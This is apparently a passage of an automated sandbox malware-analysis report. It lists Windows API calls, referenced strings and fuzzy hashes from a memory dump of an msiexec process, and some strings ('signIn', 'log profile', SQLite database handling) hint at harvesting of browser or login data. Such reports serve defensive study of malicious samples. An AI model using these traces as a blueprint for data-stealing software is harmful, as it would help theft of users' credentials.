                                                                                                        • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                        • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                        • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                        • API String ID: 3176057301-2039793938
                                                                                                        • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                        • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                        • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                        • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                                                        • out of memory, xrefs: 0042F865
                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                        • database is already attached, xrefs: 0042F721
                                                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                        • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                        • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                        • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                        • String ID: ($d
                                                                                                        • API String ID: 1140211610-1915259565
                                                                                                        • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                        • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                        • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                        • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                        APIs
                                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3015003838-0
                                                                                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00407E44
                                                                                                        • memset.MSVCRT ref: 00407E5B
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                        • wcscpy.MSVCRT ref: 00407F10
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 59245283-0
                                                                                                        • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                        • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                        • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                        • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                        • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                        • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                        • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                        • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                        • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                        • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                        • memset.MSVCRT ref: 00413ADC
                                                                                                        • memset.MSVCRT ref: 00413AEC
                                                                                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                        • memset.MSVCRT ref: 00413BD7
                                                                                                        • wcscpy.MSVCRT ref: 00413BF8
                                                                                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                        • String ID: 3A
                                                                                                        • API String ID: 3300951397-293699754
                                                                                                        • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                        • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                        • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                        • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                        • String ID: strings
                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                        • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                        • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041249C
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                        • wcscpy.MSVCRT ref: 004125A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                        • String ID: r!A
                                                                                                        • API String ID: 2791114272-628097481
                                                                                                        • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                        • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                        • String ID: BIN
                                                                                                        • API String ID: 1668488027-1015027815
                                                                                                        • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                        • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00411AF6
                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                        • wcsrchr.MSVCRT ref: 00411B14
                                                                                                        • wcscat.MSVCRT ref: 00411B2E
                                                                                                        Strings
                                                                                                        Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
• Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
• Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
• Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
• Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
• Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
• Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
• Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405C27
• GetDlgItem.USER32(?,000003E9), ref: 00405C3A
• GetDlgItem.USER32(?,000003E9), ref: 00405C4F
• GetDlgItem.USER32(?,000003E9), ref: 00405C67
• EndDialog.USER32(?,00000002), ref: 00405C83
• EndDialog.USER32(?,00000001), ref: 00405C98
  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
• SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
• Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
• Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
• Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
• Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
APIs
• _wcsicmp.MSVCRT ref: 00444D09
• _wcsicmp.MSVCRT ref: 00444D1E
• _wcsicmp.MSVCRT ref: 00444D33
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
• Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
• Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
• Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
• Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
APIs
• ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
• memset.MSVCRT ref: 00405E33
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
• InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
• SetFocus.USER32(?,?,?,?), ref: 00405EB8
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
• Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
• Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
• Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
APIs
• GetClientRect.USER32(?,?), ref: 00405F65
• GetWindow.USER32(?,00000005), ref: 00405F7D
• GetWindow.USER32(00000000), ref: 00405F80
  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
• GetWindow.USER32(00000000,00000002), ref: 00405F8C
• GetDlgItem.USER32(?,0000040C), ref: 00405FA2
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
• GetDlgItem.USER32(?,0000040E), ref: 00405FEB
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
• Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
• Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
• Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
• Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
